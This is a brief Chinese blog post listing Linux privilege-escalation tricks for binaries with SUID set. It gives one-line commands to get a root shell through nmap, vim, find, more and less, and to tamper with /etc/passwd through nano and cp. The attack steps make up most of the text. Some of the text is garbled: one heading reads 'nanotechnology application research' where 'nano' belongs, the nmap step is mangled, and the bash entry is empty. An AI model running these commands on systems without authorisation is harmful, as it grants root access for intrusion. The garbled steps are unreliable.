渗透测试与suid提权结合应用
发布时间
阅读量:
阅读量
可以用suid来提取的命令(前提是这些命令设置了suid权限)
- nmap
- vim
- nano
- find
- bash
- more
- less
- cp
- awk
- man
1.nmap
- 操作步骤:运行命令
nmap --script=exe.nse,并在脚本中输入代码:os.execute("/bin/bash")
2.vim
切换至vim的编辑界面后,输入以下命令以设置shell环境并进入交互模式::set shell=/bin/bash ; :shell
3.纳米技术应用研究
通过执行命令nano /etc/passwd,能够实现对root用户的添加操作。
4.find
- 执行:
find /tmp -name * -exec whoami \;通过使用find命令中的-exec参数,可以以root权限运行任意指令
5.more
- 操作:
more /etc/passwd;!/bin/bash
6.less
- 操作:
less /etc/passwd;!/bin/bash
7.cp
采用cp指令对原/etc/passwd文件进行覆盖操作
8.bash
全部评论 (0)
还没有任何评论哟~
